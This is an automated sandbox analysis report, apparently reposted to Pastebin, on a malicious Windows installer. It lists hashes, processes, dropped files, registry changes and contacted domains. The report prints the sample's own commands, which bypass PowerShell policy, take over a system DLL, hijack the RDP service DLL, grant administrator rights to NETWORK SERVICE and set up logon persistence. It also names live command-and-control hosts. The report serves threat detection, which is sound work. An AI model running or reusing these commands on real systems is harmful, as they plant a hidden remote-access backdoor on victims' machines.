paladin316

Exes_4c0c090f5087f893db72d564ec51a73d_exe_2019-07-13_18_30.txt

Jul 13th, 2019
2,438
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.39 KB | None | 0 0
  1.  
  2. * MalFamily: "Malicious"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_4c0c090f5087f893db72d564ec51a73d.exe"
  7. * File Size: 3271775
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive"
  9. * SHA256: "d683984b291146d86be69ff3753a2e479f314ce119352364336dfe27f4ae9bc8"
  10. * MD5: "4c0c090f5087f893db72d564ec51a73d"
  11. * SHA1: "65aa8f44b76ff92ffec745f6830f337079164964"
  12. * SHA512: "b141143835bbe6ad012abb0f064392e4e386166ee2959e5cdb5a0ca4a6087558153a252454b3549f884f1fc1e09a35de6c9a3a7bb63014304af4e814d0d2c788"
  13. * CRC32: "7EA3F0D1"
  14. * SSDEEP: "98304:ZQoyb3/o0aAobmi5yVcPkdSxpc0I7TZEWDL7J4:qoybPoNbfDPzxSBrDLO"
  15.  
  16. * Process Execution:
  17. "Exes_4c0c090f5087f893db72d564ec51a73d.exe",
  18. "cmd.exe",
  19. "powershell.exe",
  20. "takeown.exe",
  21. "icacls.exe",
  22. "icacls.exe",
  23. "icacls.exe",
  24. "icacls.exe",
  25. "icacls.exe",
  26. "icacls.exe",
  27. "icacls.exe",
  28. "reg.exe",
  29. "reg.exe",
  30. "net.exe",
  31. "net1.exe",
  32. "cmd.exe",
  33. "cmd.exe",
  34. "services.exe",
  35. "svchost.exe",
  36. "WmiPrvSE.exe",
  37. "svchost.exe",
  38. "cmd.exe",
  39. "rundll32.exe",
  40. "svchost.exe",
  41. "svchost.exe",
  42. "rundll32.exe",
  43. "cmd.exe",
  44. "rundll32.exe",
  45. "cmd.exe",
  46. "updsvc.exe",
  47. "cmd.exe",
  48. "schtasks.exe",
  49. "svchost.exe",
  50. "taskeng.exe",
  51. "taskhost.exe"
  52.  
  53.  
  54. * Executed Commands:
  55. "\"C:\\Windows\\system32\\cmd.exe\" /C powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\mezocart.ps1",
  56. "powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\mezocart.ps1",
  57. "\"C:\\Windows\\system32\\takeown.exe\" /A /F rfxvmt.dll",
  58. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /inheritance:d",
  59. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /setowner \"NT SERVICE\\TrustedInstaller\"",
  60. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT SERVICE\\TrustedInstaller:F\"",
  61. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove \"NT AUTHORITY\\SYSTEM\"",
  62. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT AUTHORITY\\SYSTEM:RX\"",
  63. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove BUILTIN\\Administrators",
  64. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant BUILTIN\\Administrators:RX",
  65. "\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 0x1C21 /f",
  66. "\"C:\\Windows\\system32\\reg.exe\" add HKLM\\system\\currentcontrolset\\services\\TermService\\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\\help\\hlp11.dat /f",
  67. "\"C:\\Windows\\system32\\net.exe\" localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
  68. "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.ps1 /f",
  69. "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.txt /f",
  70. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  71. "C:\\Windows\\system32\\net1 localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
  72. "C:\\Windows\\System32\\svchost.exe -k NetworkService",
  73. "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted",
  74. "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
  75. "cmd.exe /c rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
  76. "rundll32.exe c:\\windows\\help\\hlp12.dat, deployns",
  77. "cmd.exe /c C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat,, deployns ns launch",
  78. "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat,, deployns ns launch",
  79. "cmd.exe /c start c:\\windows\\temp\\updsvc.exe",
  80. "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f",
  81. "c:\\windows\\temp\\updsvc.exe",
  82. "schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f",
  83. "\"c:\\windows\\temp\\GetUserLang.exe\"",
  84. "taskeng.exe 4E38B39C-5B88-4830-BF72-CB0BB9FA31B5 S-1-5-18:NT AUTHORITY\\System:Service:",
  85. "taskeng.exe 593336AC-9BD0-4CA7-AC55-D0071F987E25 S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
  86. "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
  87.  
  88.  
  89. * Signatures Detected:
  90.  
  91. "Description": "Creates RWX memory",
  92. "Details":
  93.  
  94.  
  95. "Description": "Possible date expiration check, exits too soon after checking local time",
  96. "Details":
  97.  
  98. "process": "cmd.exe, PID 2368"
  99.  
  100.  
  101.  
  102.  
  103. "Description": "Attempts to connect to a dead IP:Port (5 unique times)",
  104. "Details":
  105.  
  106. "IP": "94.158.245.154:443"
  107.  
  108.  
  109. "IP": "185.225.17.66:443"
  110.  
  111.  
  112. "IP": "185.163.45.181:80"
  113.  
  114.  
  115. "IP": "192.35.177.64:80"
  116.  
  117.  
  118. "IP": "23.15.4.24:80"
  119.  
  120.  
  121.  
  122.  
  123. "Description": "Loads a driver",
  124. "Details":
  125.  
  126. "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
  127.  
  128.  
  129.  
  130.  
  131. "Description": "Expresses interest in specific running processes",
  132. "Details":
  133.  
  134. "process": "rundll32.exe"
  135.  
  136.  
  137. "process": "winlogon.exe"
  138.  
  139.  
  140. "process": "explorer.exe"
  141.  
  142.  
  143.  
  144.  
  145. "Description": "Reads data out of its own binary image",
  146. "Details":
  147.  
  148. "self_read": "process: Exes_4c0c090f5087f893db72d564ec51a73d.exe, pid: 1840, offset: 0x00000000, length: 0x0031ec5b"
  149.  
  150.  
  151. "self_read": "process: Exes_4c0c090f5087f893db72d564ec51a73d.exe, pid: 1840, offset: 0x0003a41c, length: 0x002e4843"
  152.  
  153.  
  154.  
  155.  
  156. "Description": "A process created a hidden window",
  157. "Details":
  158.  
  159. "Process": "Exes_4c0c090f5087f893db72d564ec51a73d.exe -> \"C:\\Windows\\system32\\cmd.exe\""
  160.  
  161.  
  162. "Process": "rundll32.exe -> cmd.exe"
  163.  
  164.  
  165. "Process": "rundll32.exe -> cmd.exe"
  166.  
  167.  
  168.  
  169.  
  170. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  171. "Details":
  172.  
  173. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  174.  
  175.  
  176. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  177.  
  178.  
  179. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  180.  
  181.  
  182. "suspicious_request": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm"
  183.  
  184.  
  185. "suspicious_request": "http://geo.netsupportsoftware.com/location/loca.asp"
  186.  
  187.  
  188.  
  189.  
  190. "Description": "Performs some HTTP requests",
  191. "Details":
  192.  
  193. "url": "http://apps.identrust.com/roots/dstrootcax3.p7c"
  194.  
  195.  
  196. "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
  197.  
  198.  
  199. "url": "http://suppl.icu/2.txt"
  200.  
  201.  
  202. "url": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm"
  203.  
  204.  
  205. "url": "http://geo.netsupportsoftware.com/location/loca.asp"
  206.  
  207.  
  208.  
  209.  
  210. "Description": "Deletes its original binary from disk",
  211. "Details":
  212.  
  213.  
  214. "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
  215. "Details":
  216.  
  217. "Process": "svchost.exe (1704)"
  218.  
  219.  
  220.  
  221.  
  222. "Description": "Attempts to stop active services",
  223. "Details":
  224.  
  225. "servicename": "UmRdpService"
  226.  
  227.  
  228.  
  229.  
  230. "Description": "A process attempted to delay the analysis task by a long amount of time.",
  231. "Details":
  232.  
  233. "Process": "svchost.exe tried to sleep 4835 seconds, actually delayed analysis time by 0 seconds"
  234.  
  235.  
  236. "Process": "powershell.exe tried to sleep 301 seconds, actually delayed analysis time by 0 seconds"
  237.  
  238.  
  239.  
  240.  
  241. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  242. "Details":
  243.  
  244. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 10287594 times"
  245.  
  246.  
  247.  
  248.  
  249. "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
  250. "Details":
  251.  
  252. "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
  253.  
  254.  
  255.  
  256.  
  257. "Description": "Installs itself for autorun at Windows startup",
  258. "Details":
  259.  
  260. "service name": "RunAsSystem1224"
  261.  
  262.  
  263. "service path": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns "
  264.  
  265.  
  266. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ImagePath"
  267.  
  268.  
  269. "data": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\hlp12.dat, deployns "
  270.  
  271.  
  272. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL"
  273.  
  274.  
  275. "data": "%SystemRoot%\\help\\hlp11.dat"
  276.  
  277.  
  278. "task": "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f"
  279.  
  280.  
  281.  
  282.  
  283. "Description": "Creates a hidden or system file",
  284. "Details":
  285.  
  286. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF117a470.TMP"
  287.  
  288.  
  289. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft"
  290.  
  291.  
  292. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache"
  293.  
  294.  
  295. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData"
  296.  
  297.  
  298. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content"
  299.  
  300.  
  301. "file": "C:\\Windows\\Temp\\client32.exe"
  302.  
  303.  
  304. "file": "C:\\Windows\\Temp\\HTCTL32.DLL"
  305.  
  306.  
  307. "file": "C:\\Windows\\Temp\\msvcr100.dll"
  308.  
  309.  
  310. "file": "C:\\Windows\\Temp\\nskbfltr.inf"
  311.  
  312.  
  313. "file": "C:\\Windows\\Temp\\NSM.ini"
  314.  
  315.  
  316. "file": "C:\\Windows\\Temp\\NSM.LIC"
  317.  
  318.  
  319. "file": "C:\\Windows\\Temp\\pcicapi.dll"
  320.  
  321.  
  322. "file": "C:\\Windows\\Temp\\PCICHEK.DLL"
  323.  
  324.  
  325. "file": "C:\\Windows\\Temp\\PCICL32.DLL"
  326.  
  327.  
  328. "file": "C:\\Windows\\Temp\\remcmdstub.exe"
  329.  
  330.  
  331. "file": "C:\\Windows\\Temp\\TCCTL32.DLL"
  332.  
  333.  
  334.  
  335.  
  336. "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
  337. "Details":
  338.  
  339. "Bkav": "HW32.Packed."
  340.  
  341.  
  342. "APEX": "Malicious"
  343.  
  344.  
  345. "Paloalto": "generic.ml"
  346.  
  347.  
  348. "Kaspersky": "UDS:DangerousObject.Multi.Generic"
  349.  
  350.  
  351. "Endgame": "malicious (high confidence)"
  352.  
  353.  
  354. "Invincea": "heuristic"
  355.  
  356.  
  357. "McAfee-GW-Edition": "BehavesLike.Win32.Dropper.wc"
  358.  
  359.  
  360. "FireEye": "Generic.mg.4c0c090f5087f893"
  361.  
  362.  
  363. "Webroot": "W32.Malware.Gen"
  364.  
  365.  
  366. "Microsoft": "Program:Win32/Unwaders.A!ml"
  367.  
  368.  
  369. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  370.  
  371.  
  372. "AhnLab-V3": "PUP/Win32.RL_Generic.R278935"
  373.  
  374.  
  375. "Acronis": "suspicious"
  376.  
  377.  
  378. "SentinelOne": "DFI - Malicious PE"
  379.  
  380.  
  381. "CrowdStrike": "win/malicious_confidence_60% (W)"
  382.  
  383.  
  384.  
  385.  
  386. "Description": "Attempts to create or modify system certificates",
  387. "Details":
  388.  
  389.  
  390.  
  391. * Started Service:
  392. "TermService",
  393. "UmRdpService",
  394. "RunAsSystem1224"
  395.  
  396.  
  397. * Mutexes:
  398. "Global\\CLR_CASOFF_MUTEX",
  399. "TSLicensingLock"
  400.  
  401.  
  402. * Modified Files:
  403. "C:\\Users\\user\\AppData\\Local\\Temp\\mezocart.ps1",
  404. "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
  405. "C:\\Users\\user\\AppData\\Local\\Temp\\nsqA5B3.tmp\\System.dll",
  406. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  407. "\\??\\PIPE\\srvsvc",
  408. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\XQTZGRJ5CFYOY67CWD37.temp",
  409. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF117a470.TMP",
  410. "C:\\Windows\\Help\\hlp11.dat",
  411. "C:\\Windows\\Help\\hlp12.dat",
  412. "C:\\Windows\\Help\\hlp13.dat",
  413. "C:\\Windows\\sysnative\\rfxvmt.dll",
  414. "C:\\Windows\\Temp\\desk.txt",
  415. "C:\\Windows\\inf\\setupapi.dev.log",
  416. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  417. "\\??\\PIPE\\lsarpc",
  418. "\\??\\PIPE\\samr",
  419. "C:\\Windows\\sysnative\\LogFiles\\Scm\\8d661786-e909-433d-bd16-a47ccb39306a",
  420. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  421. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\mod.txt",
  422. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\daasf44f3.dat",
  423. "C:\\Windows\\Help\\79574.ps1",
  424. "\\Device\\Termdd",
  425. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\aa.txt",
  426. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
  427. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E0F5C59F9FA661F6F4C50B87FEF3A15A",
  428. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015",
  429. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015",
  430. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Cab3720.tmp",
  431. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Tar3721.tmp",
  432. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep870.bin",
  433. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep945.zip",
  434. "C:\\Windows\\Temp\\client32.exe",
  435. "C:\\Windows\\Temp\\client32.ini",
  436. "C:\\Windows\\Temp\\HTCTL32.DLL",
  437. "C:\\Windows\\Temp\\msvcr100.dll",
  438. "C:\\Windows\\Temp\\nskbfltr.inf",
  439. "C:\\Windows\\Temp\\NSM.ini",
  440. "C:\\Windows\\Temp\\NSM.LIC",
  441. "C:\\Windows\\Temp\\pcicapi.dll",
  442. "C:\\Windows\\Temp\\PCICHEK.DLL",
  443. "C:\\Windows\\Temp\\PCICL32.DLL",
  444. "C:\\Windows\\Temp\\remcmdstub.exe",
  445. "C:\\Windows\\Temp\\TCCTL32.DLL",
  446. "C:\\Windows\\Temp\\cksini.exe",
  447. "C:\\Windows\\Temp\\updsvc.exe",
  448. "\\Device\\RdpDr",
  449. "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
  450. "C:\\Windows\\Temp\\mod.txt",
  451. "C:\\Users\\user\\AppData\\Local\\Temp\\mod.txt",
  452. "C:\\Windows\\sysnative\\Tasks\\updsvc",
  453. "\\Device\\LanmanDatagramReceiver",
  454. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  455. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk"
  456.  
  457.  
  458. * Deleted Files:
  459. "C:\\Users\\user\\AppData\\Local\\Temp\\nskA322.tmp",
  460. "C:\\Users\\user\\AppData\\Local\\Temp\\nsqA5B3.tmp",
  461. "C:\\Users\\user\\AppData\\Local\\Temp\\nsqA5B3.tmp\\System.dll",
  462. "C:\\Users\\user\\AppData\\Local\\Temp\\nsqA5B3.tmp\\",
  463. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF117a470.TMP",
  464. "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
  465. "C:\\Users\\user\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt",
  466. "C:\\Users\\user\\AppData\\Local\\Temp\\mezocart.ps1",
  467. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_4c0c090f5087f893db72d564ec51a73d.exe",
  468. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Cab3720.tmp",
  469. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\Tar3721.tmp",
  470. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep870.bin",
  471. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\rep945.zip",
  472. "C:\\Windows\\Temp\\client32.exe",
  473. "C:\\Windows\\Tasks\\updsvc.job",
  474. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  475.  
  476.  
  477. * Modified Registry Keys:
  478. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  479. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus",
  480. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\StartTime",
  481. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\Progress",
  482. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties",
  483. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29",
  484. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009",
  485. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000",
  486. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Type",
  487. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Data",
  488. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus",
  489. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus\\setupapi.dev.log",
  490. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber",
  491. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL",
  492. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
  493. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224",
  494. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\Type",
  495. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\Start",
  496. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ErrorControl",
  497. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ImagePath",
  498. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\DisplayName",
  499. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\ObjectName",
  500. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RunAsSystem1224\\DeleteFlag",
  501. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
  502. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\FSingleSessionPerUser",
  503. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\LimitBlankPasswordUse",
  504. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
  505. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
  506. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
  507. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
  508. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\WgaUtilAcc",
  509. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\fAllowToGetHelp",
  510. "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
  511. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
  512. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
  513. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
  514. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld",
  515. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\\Blob",
  516. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\306DE47D-F02C-4A28-A9AB-E8E97A3511B1\\Path",
  517. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\306DE47D-F02C-4A28-A9AB-E8E97A3511B1\\Hash",
  518. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\updsvc\\Id",
  519. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\updsvc\\Index",
  520. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\306DE47D-F02C-4A28-A9AB-E8E97A3511B1\\Triggers",
  521. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\306DE47D-F02C-4A28-A9AB-E8E97A3511B1\\DynamicInfo",
  522. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
  523. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\4E38B39C-5B88-4830-BF72-CB0BB9FA31B5",
  524. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
  525. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\593336AC-9BD0-4CA7-AC55-D0071F987E25",
  526. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
  527. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\4E38B39C-5B88-4830-BF72-CB0BB9FA31B5\\data"
  528.  
  529.  
  530. * Deleted Registry Keys:
  531. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object",
  532. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13",
  533. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\updsvc.job",
  534. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\updsvc.job.fp"
  535.  
  536.  
  537. * DNS Communications:
  538.  
  539. "type": "A",
  540. "request": "gidjshrvz.xyz",
  541. "answers":
  542.  
  543. "data": "94.158.245.154",
  544. "type": "A"
  545.  
  546.  
  547.  
  548.  
  549. "type": "A",
  550. "request": "apps.identrust.com",
  551. "answers":
  552.  
  553. "data": "192.35.177.64",
  554. "type": "A"
  555.  
  556.  
  557. "data": "apps.digsigtrust.com",
  558. "type": "CNAME"
  559.  
  560.  
  561.  
  562.  
  563. "type": "A",
  564. "request": "suppl.icu",
  565. "answers":
  566.  
  567. "data": "185.163.45.181",
  568. "type": "A"
  569.  
  570.  
  571.  
  572.  
  573. "type": "A",
  574. "request": "geo.netsupportsoftware.com",
  575. "answers":
  576.  
  577. "data": "62.172.138.35",
  578. "type": "A"
  579.  
  580.  
  581. "data": "geograph.netsupportsoftware.com",
  582. "type": "CNAME"
  583.  
  584.  
  585. "data": "195.171.92.116",
  586. "type": "A"
  587.  
  588.  
  589.  
  590.  
  591.  
  592. * Domains:
  593.  
  594. "ip": "185.163.45.181",
  595. "domain": "suppl.icu"
  596.  
  597.  
  598. "ip": "62.172.138.35",
  599. "domain": "geo.netsupportsoftware.com"
  600.  
  601.  
  602. "ip": "94.158.245.154",
